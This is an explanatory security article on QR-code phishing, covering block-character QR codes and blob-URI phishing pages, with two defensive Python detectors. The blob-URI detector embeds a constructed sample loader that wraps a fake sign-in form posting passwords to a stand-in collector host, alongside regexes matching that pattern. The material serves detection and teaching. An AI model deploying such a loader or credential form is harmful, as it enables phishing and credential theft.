Introduction

There has been a notable recent surge in QR code phishing attacks, also known as “quishing.” These attacks exploit QR codes to deceive users into revealing sensitive information, and they are a significant threat because the malicious link is hidden inside an image or, increasingly, inside text that does not look like a link at all. This document describes the tactics employed by cybercriminals and the challenges security systems face in detecting and mitigating these threats.

Description

Threat analysts at Barracuda Networks have identified a significant increase in QR code phishing attacks, commonly referred to as “quishing” [3][4]. Their data indicates that approximately 1 in 20 mailboxes encountered such an attack in the last quarter of 2023. In quishing, attackers use QR codes to redirect victims to malicious websites or prompt them to download harmful content, with the primary objective of stealing sensitive information such as passwords, financial data, and personally identifiable information (PII) [1]. The stolen information can then be used for identity theft, financial fraud, or ransomware [1].

Scammers are refining their tactics to evade detection by security systems [2]. One technique builds a functional QR code out of ASCII or Unicode characters, typically U+2588 FULL BLOCK [3], so that the code renders as a scannable pattern in the recipient’s mail client but appears as nonsensical text to traditional security tools [2]. Defenses that locate QR codes by scanning embedded images find no image to analyze, and optical character recognition (OCR) applied to the message yields only meaningless characters [4]. Even conventional image-based QR codes frequently circumvent traditional defenses such as secure email gateways, which tend to treat them as meaningless images [1], leaving users exposed [1].

In these attacks the malicious link is embedded in a QR code that is presented with a plausible pretext, such as a ‘Payroll and Benefits Enrollment’ file sent by an administrator [3]. When scanned [3], the code directs the victim to a counterfeit page that mimics a trusted service, including fraudulent Microsoft login pages and impersonations of major brands such as Air Canada, CapitalOne [2], and Chase [2][5]. Because a single URL can be encoded in many different ways (different encoding modes, error-correction levels and masks all produce different module patterns, and the modules can be rendered with different characters), attackers can generate numerous distinct QR codes for the same destination, complicating signature-based detection [3].
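The detection problem described in the two paragraphs above, as an added example that is not from Barracuda or the cited articles: a block-character QR code looks like junk text to a mail filter, but its geometry is rigid, a square grid of modules with the 7x7 finder pattern in three corners. The script below finds runs of block-character lines in a message body, normalises them to a 0/1 grid, checks for that geometry, and writes the grid out as a PBM image that a real QR decoder can read. It goes beyond the FULL BLOCK case the text mentions by also handling the half-block characters (U+2580/U+2584) and doubled-column layouts that common text renderers produce. The sample message and the grid inside it are constructed here; the grid has QR geometry but is not a decodable code.

```python
"""Detect QR codes rendered as Unicode block characters in email text.

Added example, not code from Barracuda or the cited reports. Sample data
below is constructed for the demonstration.
"""
import re

FULL, UPPER, LOWER = "\u2588", "\u2580", "\u2584"
# A text line made only of block characters and spaces.
BLOCK_LINE = re.compile(r"^[\u2588\u2580\u2584 ]+$")
# The 7x7 finder pattern that sits in three corners of every QR symbol.
FINDER = ["1111111", "1000001", "1011101", "1011101",
          "1011101", "1000001", "1111111"]


def lines_to_matrix(lines):
    """Turn block-character lines into a grid of 0/1 (1 = dark module).

    Half blocks (U+2580/U+2584) pack two module rows into one text line;
    renderers that use only U+2588 often print each module twice so the
    symbol looks square in a monospace font. Both layouts are normalised.
    """
    width = max(len(l) for l in lines)
    lines = [l.ljust(width) for l in lines]       # restore stripped spaces
    half = any(UPPER in l or LOWER in l for l in lines)
    rows = []
    for line in lines:
        rows.append([int(c in (FULL, UPPER)) for c in line])
        if half:
            rows.append([int(c in (FULL, LOWER)) for c in line])
    if not half and width == 2 * len(rows):
        rows = [r[::2] for r in rows]             # collapse doubled columns
    if len(rows) == len(rows[0]) + 1 and not any(rows[-1]):
        rows.pop()                                # drop half-block padding row
    return rows


def has_finder(m, r0, c0):
    """True if the 7x7 finder pattern sits with its corner at (r0, c0)."""
    return all(m[r0 + i][c0 + j] == int(FINDER[i][j])
               for i in range(7) for j in range(7))


def looks_like_qr(m):
    """Square grid of at least 21 modules with finders in three corners."""
    n = len(m)
    if n < 21 or any(len(r) != n for r in m):
        return False
    return (has_finder(m, 0, 0) and has_finder(m, 0, n - 7)
            and has_finder(m, n - 7, 0))


def find_text_qr(body):
    """Return every run of block-character lines in body that forms a QR."""
    hits, run, start = [], [], 0
    for i, line in enumerate(body.splitlines() + [""]):   # "" flushes last run
        if line.strip() and BLOCK_LINE.match(line):
            if not run:
                start = i
            run.append(line)
            continue
        if run:
            m = lines_to_matrix(run)
            if looks_like_qr(m):
                hits.append({"line": start, "modules": len(m), "matrix": m})
            run = []
    return hits


def to_pbm(m, quiet=4):
    """Render the grid as a plain PBM (P1) image with a quiet zone so a
    real QR decoder can read what the mail filter only saw as text."""
    size = len(m) + 2 * quiet
    img = [[0] * size for _ in range(quiet)]
    img += [[0] * quiet + row + [0] * quiet for row in m]
    img += [[0] * size for _ in range(quiet)]
    body = "\n".join(" ".join(str(v) for v in row) for row in img)
    return "P1\n%d %d\n%s\n" % (size, size, body)


def synthetic_grid(n=21):
    """Constructed 21x21 grid: QR finders plus deterministic filler.
    It has the geometry the detector keys on but is NOT a decodable QR."""
    m = [[int((r * 7 + c * 3) % 5 < 2) for c in range(n)] for r in range(n)]
    for r0, c0 in ((0, 0), (0, n - 7), (n - 7, 0)):
        for i in range(7):
            for j in range(7):
                m[r0 + i][c0 + j] = int(FINDER[i][j])
    return m


def render_half_blocks(m):
    """Two module rows per text line, as many text QR renderers do."""
    rows = (m + [[0] * len(m[0])]) if len(m) % 2 else m
    return "\n".join(
        "".join((FULL if t and b else (UPPER if t else (LOWER if b else " ")))
                for t, b in zip(top, bot))
        for top, bot in zip(rows[::2], rows[1::2]))


def render_full_blocks(m):
    """U+2588 only, each module printed twice to keep it square."""
    return "\n".join("".join((FULL * 2) if v else "  " for v in row) for row in m)


# Constructed sample message; the lure wording mirrors the report above.
SAMPLE_EMAIL = ("From: hr-admin@example.invalid\n"
                "Subject: Payroll and Benefits Enrollment\n\n"
                "Scan the code below to complete your enrollment:\n\n"
                + render_half_blocks(synthetic_grid()) +
                "\n\nThank you,\nHR Team\n")

if __name__ == "__main__":
    for hit in find_text_qr(SAMPLE_EMAIL):
        print("block-character QR at line %d: %d x %d modules"
              % (hit["line"], hit["modules"], hit["modules"]))
        with open("qr.pbm", "w") as f:           # hand this to a QR decoder
            f.write(to_pbm(hit["matrix"]))
```

Run it over the decoded text part of a suspicious message; a hit with three finders should be treated exactly like an image QR code, and the PBM it writes is what you pass to a QR decoder (most accept PBM directly or through ImageMagick) instead of taking a screenshot. The finder check is deliberately strict, so a mail client that reflows or indents the lines will defeat it; in that case loosen the grid check before loosening the finder check, since the finder pattern is what separates a QR code from a banner drawn in block characters.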

Additionally, phishers are increasingly leveraging binary large object (blob) uniform resource identifiers (URIs) to create phishing pages that are difficult to detect [2][4][5]. A blob URI is generated in the browser and refers to data that exists only in memory [2]; web developers use them to handle binary data locally without a round trip to a server [4]. Because the content behind a blob URI is never fetched from an external URL, traditional URL filtering and scanning tools have nothing to look up or download [4]. Blob URIs are also dynamic and short-lived: they are valid only within the origin and document that created them and expire when that document is unloaded, which makes them difficult to track and analyze after the fact [4]. The page that creates the blob must still be delivered to the victim, however, so the loader script itself remains a point where the attack can be caught.
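The loader pattern described above, as an added example that is not from Barracuda or the cited articles: because the blob page itself never crosses the network, the thing an analyst actually captures is the small script that creates it. The check below scores a captured page for the three parts of that pattern (an HTML blob, a call to URL.createObjectURL, and navigation to the result) and decodes any long base64 literal to see whether the embedded content carries a password form. It assumes the payload is carried as a base64 literal decoded with atob(), which is one common arrangement and not the only one; the two sample pages, including the collector hostname under .invalid, are constructed here.

```python
"""Static check for the blob-URI phishing loader pattern.

Added example, not code from Barracuda or the cited reports. The sample
pages below are constructed; the payload-as-base64 layout is an assumption.
"""
import base64
import re

# Together these describe a page that builds its own content in memory and
# navigates to it instead of fetching it from a server.
BLOB_HTML = re.compile(r"new\s+Blob\s*\(.{0,200}?type\s*:\s*['\"]text/html", re.S)
OBJECT_URL = re.compile(r"URL\.createObjectURL\s*\(")
NAVIGATE = re.compile(r"location(\.href)?\s*=|location\.(assign|replace)\s*\("
                      r"|window\.open\s*\(|\.src\s*=")
# Long base64 string literals are candidate embedded payloads.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
PASSWORD_INPUT = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)


def decode_payloads(src):
    """Decode base64 literals in src that turn out to contain HTML."""
    found = []
    for lit in B64_LITERAL.findall(src):
        try:
            text = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue                      # not base64, or not text
        if "<" in text:
            found.append(text)
    return found


def analyze_page(src):
    """Score a captured page for the blob-URI loader pattern."""
    payloads = decode_payloads(src)
    return {
        "blob_html": bool(BLOB_HTML.search(src)),
        "object_url": bool(OBJECT_URL.search(src)),
        "navigates": bool(NAVIGATE.search(src)),
        "payloads": len(payloads),
        "credential_form": any(PASSWORD_INPUT.search(p) for p in payloads),
    }


def is_blob_loader(src):
    """All three parts must be present: HTML blob, object URL, navigation.
    A blob used for a file download (the benign case) lacks the first."""
    r = analyze_page(src)
    return r["blob_html"] and r["object_url"] and r["navigates"]


# Constructed samples: a loader wrapping a fake sign-in form, and a benign
# page that uses a blob URL only to offer a CSV download.
FAKE_LOGIN = ("<html><body><h2>Sign in</h2>"
              "<form method=\"post\" action=\"https://collector.example.invalid/\">"
              "<input type=\"email\" name=\"user\">"
              "<input type=\"password\" name=\"passwd\">"
              "<button>Next</button></form></body></html>")
LOADER_PAGE = ("<html><body><script>\n"
               "var p = \"%s\";\n"
               "var b = new Blob([atob(p)], {type: \"text/html\"});\n"
               "location.href = URL.createObjectURL(b);\n"
               "</script></body></html>\n"
               % base64.b64encode(FAKE_LOGIN.encode()).decode())
BENIGN_PAGE = ("<html><body><script>\n"
               "var csv = rows.map(function (r) { return r.join(','); }).join('\\n');\n"
               "var b = new Blob([csv], {type: \"text/csv\"});\n"
               "var a = document.createElement(\"a\");\n"
               "a.href = URL.createObjectURL(b); a.download = \"report.csv\"; a.click();\n"
               "</script></body></html>\n")

if __name__ == "__main__":
    for name, page in (("loader", LOADER_PAGE), ("benign", BENIGN_PAGE)):
        print(name, is_blob_loader(page), analyze_page(page))
```

The benign page shows why the verdict needs all three parts: file-download code calls URL.createObjectURL just as the phishing loader does, and the difference is the text/html blob plus the navigation. Treat the output as triage, not proof; obfuscated loaders that assemble the MIME type or the function name at runtime will slip past these regexes, and the decoded payload is the artifact worth keeping in the incident record because the blob URL it produced cannot be revisited.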

Barracuda’s research has not observed the two techniques, ASCII/Unicode QR codes and blob URIs, being used together, but both aim to frustrate detection by making malicious content harder to identify and block [3]. If security technologies flag a potential ASCII QR code phishing attempt [3], it is recommended to capture a screenshot of the email and run a QR decoder (or an OCR pipeline that includes one) over the image to extract the URL hidden within the code [3]. Low-tech QR code scams persist as well: criminals cover legitimate QR codes with malicious ones or place fraudulent QR codes in public spaces [2], as in the recent reports by the San Francisco Municipal Transportation Agency of fraudulent QR code stickers on parking meters.

Conclusion

The rise of quishing attacks underscores the evolving nature of cyber threats and the need for advanced security measures. Organizations must enhance their detection capabilities and educate users about the risks associated with scanning unknown QR codes. As cybercriminals continue to refine their techniques, it is imperative for security systems to adapt and develop more sophisticated methods to identify and neutralize these threats. Proactive measures, such as regular security training and the implementation of robust scanning technologies, are essential to mitigate the impact of these attacks and safeguard sensitive information.

References

[1] https://www.cybersecuritytribe.com/articles/glossary-of-cybersecurity-threats-and-scams-for-2025
[2] https://www.bankinfosecurity.com/malicious-pixels-criminals-revamp-qr-code-phishing-attacks-a-26487
[3] https://blog.barracuda.com/2024/10/09/novel-phishing-techniques-ascii-based-qr-codes-blob-uri
[4] https://www.infosecurity-magazine.com/news/new-gen-malicious-qr-codes/
[5] https://thenimblenerd.com/article/blob-blob-qr-gone-the-new-phishing-threats-sneaking-past-your-security/